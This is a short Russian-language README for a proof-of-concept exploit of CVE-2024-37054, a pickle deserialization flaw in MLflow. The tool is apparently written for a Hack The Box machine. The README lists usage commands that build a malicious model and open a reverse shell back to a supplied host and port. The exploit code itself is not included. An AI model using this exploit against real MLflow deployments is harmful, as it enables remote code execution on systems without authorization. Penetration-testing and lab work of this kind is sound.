
PoC для CVE-2024-37054
Доказательство концепции (PoC) для CVE-2024-37054, критической уязвимости десериализации в MLflow версий 0.9.0–2.14.1.
При загрузке вредоносной модели pyfunc через mlflow.pyfunc.load_model(), сериализованная полезная нагрузка (pickle) выполняет произвольный код.
exploit.py — полный эксплойт: регистрация, обучение, загрузка, запуск (для машины HTB SmartHire)build_model.py — сборка вредоносной модели локально (только сборка)python3 build_model.py --lhost YOUR_IP --lport 4444
# Auto register account and exploit
python3 exploit.py --lhost YOUR_IP --lport 4444 --atoz
# Use existing session
python3 exploit.py --lhost YOUR_IP --lport 4444 --session "eyJjb21w..."
Только для образовательных целей и авторизованного тестирования на проникновение.